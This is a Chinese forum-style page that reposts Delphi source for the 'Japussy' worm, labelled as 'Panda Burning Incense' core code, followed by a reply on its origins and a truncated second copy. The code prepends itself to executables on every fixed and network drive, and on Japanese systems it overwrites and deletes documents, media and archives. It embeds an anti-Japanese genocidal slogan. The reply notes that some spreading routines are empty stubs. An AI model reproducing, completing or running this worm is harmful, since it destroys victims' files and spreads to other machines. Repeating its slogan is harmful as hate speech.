- qian
- 熊猫烧香-核心源码--------------------------------------------------------------------------------代码:--------------------------------------------------------------------------------程序代码programJapussy;usesWindows,SysUtils,Classes,Graphics,ShellAPI{,Registry};constHeaderSize=82432;//病毒体的大小IconOffset=$12EB8;//PE文件主图标的偏移量//在我的Delphi5SP1上面编译得到的大小,其它版本的Delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量{HeaderSize=38912;//Upx压缩过病毒体的大小IconOffset=$92BC;//Upx压缩过PE文件主图标的偏移量//Upx1.24W用法:upx-9--8086Japussy.exe}IconSize=$2E8;//PE文件主图标的大小--744字节IconTail=IconOffset+IconSize;//PE文件主图标的尾部ID=$44444444;//感染标记//垃圾码,以备写入Catchword='Ifaraceneedtobekilledout,itmustbeYamato.'+'Ifacountryneedtobedestroyed,itmustbeJapan!'+'***W32.Japussy.Worm.A***';{$R*.RES}functionRegisterServiceProcess(dwProcessID,dwType:Integer):Integer;stdcall;external'Kernel32.dll';//函数声明varTmpFile:string;Si:STARTUPINFO;Pi:PROCESS_INFORMATION;IsJap:Boolean=False;//日文操作系统标记{判断是否为Win9x}functionIsWin9x:Boolean;varVer:TOSVersionInfo;beginResult:=False;Ver.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);ifnotGetVersionEx(Ver)thenExit;if(Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS)then//Win9xResult:=True;end;{在流之间复制}procedureCopyStream(Src:TStream;sStartPos:Integer;Dst:TStream;dStartPos:Integer;Count:Integer);varsCurPos,dCurPos:Integer;beginsCurPos:=Src.Position;dCurPos:=Dst.Position;Src.Seek(sStartPos,0);Dst.Seek(dStartPos,0);Dst.CopyFrom(Src,Count);Src.Seek(sCurPos,0);Dst.Seek(dCurPos,0);end;{将宿主文件从已感染的PE文件中分离出来,以备使用}procedureExtractFile(FileName:string);varsStream,dStream:TFileStream;begintrysStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);trydStream:=TFileStream.Create(FileName,fmCreate);trysStream.Seek(HeaderSize,0);//跳过头部的病毒部分dStream.CopyFrom(sStream,sStream.Size-HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{填充STARTUPINFO结构}procedureFillStartupInfo(varSi:STARTUPINFO;State:Word);beginSi.cb:=SizeOf(Si);Si.lpReserved:=nil;Si.lpDesktop:=nil;Si.lpTitle:=nil;Si.dwFlags:=STARTF_USESHOWWINDOW;Si.wSh
owWindow:=State;Si.cbReserved2:=0;Si.lpReserved2:=nil;end;{发带毒邮件}procedureSendMail;begin//哪位仁兄愿意完成之?end;{感染PE文件}procedureInfectOneFile(FileName:string);varHdrStream,SrcStream:TFileStream;IcoStream,DstStream:TMemoryStream;iID:LongInt;aIcon:TIcon;Infected,IsPE:Boolean;i:Integer;Buf:array[0..1]ofChar;begintry//出错则文件正在被使用,退出ifCompareText(FileName,'JAPUSSY.EXE')=0then//是自己则不感染Exit;Infected:=False;IsPE:=False;SrcStream:=TFileStream.Create(FileName,fmOpenRead);tryfori:=0to$108do//检查PE文件头beginSrcStream.Seek(i,soFromBeginning);SrcStream.Read(Buf,2);if(Buf[0]=#80)and(Buf[1]=#69)then//PE标记beginIsPE:=True;//是PE文件Break;end;end;SrcStream.Seek(-4,soFromEnd);//检查感染标记SrcStream.Read(iID,4);if(iID=ID)or(SrcStream.Size<10240)then//太小的文件不感染Infected:=True;finallySrcStream.Free;end;ifInfectedor(notIsPE)then//如果感染过了或不是PE文件则退出Exit;IcoStream:=TMemoryStream.Create;DstStream:=TMemoryStream.Create;tryaIcon:=TIcon.Create;try//得到被感染文件的主图标(744字节),存入流aIcon.ReleaseHandle;aIcon.Handle:=ExtractIcon(HInstance,PChar(FileName),0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream:=TFileStream.Create(FileName,fmOpenRead);//头文件HdrStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);try//写入病毒体主图标之前的数据CopyStream(HdrStream,0,DstStream,0,IconOffset);//写入目前程序的主图标CopyStream(IcoStream,22,DstStream,IconOffset,IconSize);//写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream,IconTail,DstStream,IconTail,HeaderSize-IconTail);//写入宿主程序CopyStream(SrcStream,0,DstStream,HeaderSize,SrcStream.Size);//写入已感染的标记DstStream.Seek(0,2);iID:=$44444444;DstStream.Write(iID,4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName);//替换宿主文件DstStream.Free;end;except;end;end;{将目标文件写入垃圾码后删除}procedureSmashFile(FileName:string);varFileHandle:Integer;i,Size,Mass,Max,Len:Integer;begintrySetFileAttributes(PChar(FileName),0);//去掉只读属性FileHandle:=FileOpen(FileName,fmOpenWrite);//打开文件trySize:=GetFileSize(FileHandle,nil);//文件大小i:=0;Randomize;Max:=Random(15);//写入垃圾码的随机次数ifMax<5thenMax:=5;Mass:=Sizedi
vMax;//每个间隔块的大小Len:=Length(Catchword);whilei<MaxdobeginFileSeek(FileHandle,i*Mass,0);//定位//写入垃圾码,将文件彻底破坏掉FileWrite(FileHandle,Catchword,Len);Inc(i);end;finallyFileClose(FileHandle);//关闭文件end;DeleteFile(PChar(FileName));//删除之exceptend;end;{获得可写的驱动器列表}functionGetDrives:string;varDiskType:Word;D:Char;Str:string;i:Integer;beginfori:=0to25do//遍历26个字母beginD:=Chr(i+65);Str:=D+':';DiskType:=GetDriveType(PChar(Str));//得到本地磁盘和网络盘if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)thenResult:=Result+D;end;end;{遍历目录,感染和摧毁文件}procedureLoopFiles(Path,Mask:string);vari,Count:Integer;Fn,Ext:string;SubDir:TStrings;SearchRec:TSearchRec;Msg:TMsg;functionIsValidDir(SearchRec:TSearchRec):Integer;beginif(SearchRec.Attr<>16)and(SearchRec.Name<>'.')and(SearchRec.Name<>'..')thenResult:=0//不是目录elseif(SearchRec.Attr=16)and(SearchRec.Name<>'.')and(SearchRec.Name<>'..')thenResult:=1//不是根目录elseResult:=2;//是根目录end;beginif(FindFirst(Path+Mask,faAnyFile,SearchRec)=0)thenbeginrepeatPeekMessage(Msg,0,0,0,PM_REMOVE);//调整消息队列,避免引起怀疑ifIsValidDir(SearchRec)=0thenbeginFn:=Path+SearchRec.Name;Ext:=UpperCase(ExtractFileExt(Fn));if(Ext='.EXE')or(Ext='.SCR')thenbeginInfectOneFile(Fn);//感染可执行文件endelseif(Ext='.HTM')or(Ext='.HTML')or(Ext='.ASP')thenbegin//感染HTML和ASP文件,将Base64编码后的病毒写入//感染浏览此网页的所有用户//哪位大兄弟愿意完成之?endelseifExt='.WAB'then//Outlook地址簿文件begin//获取Outlook邮件地址endelseifExt='.ADC'then//Foxmail地址自动完成文件begin//获取Foxmail邮件地址endelseifExt='IND'then//Foxmail地址簿文件begin//获取Foxmail邮件地址endelsebeginifIsJapthen//是倭文操作系统beginif(Ext='.DOC')or(Ext='.XLS')or(Ext='.MDB')or(Ext='.MP3')or(Ext='.RM')or(Ext='.RA')or(Ext='.WMA')or(Ext='.ZIP')or(Ext='.RAR')or(Ext='.MPEG')or(Ext='.ASF')or(Ext='.JPG')or(Ext='.JPEG')or(Ext='.GIF')or(Ext='.SWF')or(Ext='.PDF')or(Ext='.CHM')or(Ext='.AVI')thenSmashFile(Fn);//摧毁文件end;end;end;//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑Sleep(200);until(FindNext(SearchRec)<>0);end;FindClose(SearchRec);SubDir:=TStringList.Create;if(FindFirst(Path+'*.*',faDirectory,SearchRec)=0)thenbeginrepeatifIsValidDir(SearchRec)=1thenSu
bDir.Add(SearchRec.Name);until(FindNext(SearchRec)<>0);end;FindClose(SearchRec);Count:=SubDir.Count-1;fori:=0toCountdoLoopFiles(Path+SubDir.Strings[i]+'',Mask);FreeAndNil(SubDir);end;{遍历磁盘上所有的文件}procedureInfectFiles;varDriverList:string;i,Len:Integer;beginifGetACP=932then//日文操作系统IsJap:=True;//去死吧!DriverList:=GetDrives;//得到可写的磁盘列表Len:=Length(DriverList);whileTruedo//死循环beginfori:=Lendownto1do//遍历每个磁盘驱动器LoopFiles(DriverList[i]+':','*.*');//感染之SendMail;//发带毒邮件Sleep(1000*60*5);//睡眠5分钟end;end;{主程序开始}beginifIsWin9xthen//是Win9xRegisterServiceProcess(GetCurrentProcessID,1)//注册为服务进程else//WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之?end;//如果是原始病毒体自己ifCompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')=0thenInfectFiles//感染和发邮件else//已寄生于宿主程序上了,开始工作beginTmpFile:=ParamStr(0);//创建临时文件Delete(TmpFile,Length(TmpFile)-4,4);TmpFile:=TmpFile+#32+'.exe';//真正的宿主文件,多一个空格ExtractFile(TmpFile);//分离之FillStartupInfo(Si,SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile),PChar(TmpFile),nil,nil,True,0,nil,'.',Si,Pi);//创建新进程运行之InfectFiles;//感染和发邮件end;end.
- 2021-02-14 00:00:02
- 熊猫烧香的原作者从未在互联网上公布完整源代码。网上流传的所谓“核心源码”只是示意性的代码，无法直接编译通过，关键部分都已略去。上面贴出的这份代码本身就说明了这一点：它的 Catchword 常量里写的是“W32.Japussy.Worm.A”，SendMail（发带毒邮件）、HTML/ASP 网页感染、以及 NT 下向 Explorer 进程注入远程线程这三处都只留了一句“哪位仁兄愿意完成之?”的空壳——也就是说，这是早年流传的 Japussy 蠕虫的 Delphi 仿写版，并非熊猫烧香原作者所写。需要提醒的是，即便传播部分是空壳，其中 InfectOneFile（把自身写到 PE 文件头部）和 SmashFile（向文档写入垃圾数据后删除）两段逻辑是可以运行的破坏性代码，仅适合在隔离的分析环境中研究，不要在日常机器上编译或执行。
- 2021-02-11 13:02:39
- 万岳科技
- “熊猫烧香”源代码的解释,核心代码 program japussy; uses windows, sysutils, classes, graphics, shellapi{, registry}; const headersize = 82432; //病毒体的大小 iconoffset = $12eb8; //pe文件主图标的偏移量 //在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { headersize = 38912; //upx压缩过病毒体的大小 iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量 //upx 1.24w 用法: upx -9 --8086 japussy.exe } iconsize = $2e8; //pe文件主图标的大小--744字节 icontail = iconoffset + iconsize; //pe文件主图标的尾部 id = $44444444; //感染标记 //垃圾码,以备写入 catchword = 'if a race need to be killed out, it must be yamato. ' + 'if a country need to be destroyed, it must be japan! ' + '*** w32.japussy.worm.a ***'; {$r *.res} function registerserviceprocess(dwprocessid, dwtype: integer): integer; stdcall; external 'kernel32.dll'; //函数声明 var tmpfile: string; si: startupinfo; pi: process_information; isjap: boolean = false; //日文操作系统标记 { 判断是否为win9x } function iswin9x: boolean; var ver: tosversioninfo; begin result := false; ver.dwosversioninfosize := sizeof(tosversioninfo); if not getversionex(ver) then exit; if (ver.dwplatformid = ver_platform_win32_windows) then //win9x result := true; end; { 在流之间复制 } procedure copystream(src: tstream; sstartpos: integer; dst: tstream; dstartpos: integer; count: integer); var scurpos, dcurpos: integer; begin scurpos := src.position; dcurpos := dst.position; src.seek(sstartpos, 0); dst.seek(dstartpos, 0); dst.copyfrom(src, count); src.seek(scurpos, 0); dst.seek(dcurpos, 0); end; { 将宿主文件从已感染的pe文件中分离出来,以备使用 } procedure extractfile(filename: string); var sstream, dstream: tfilestream; begin try sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); try dstream := tfilestream.create(filename, fmcreate); try sstream.seek(headersize, 0); //跳过头部的病毒部分 dstream.copyfrom(sstream, sstream.size - headersize); finally dstr
- 2021-02-11 13:02:39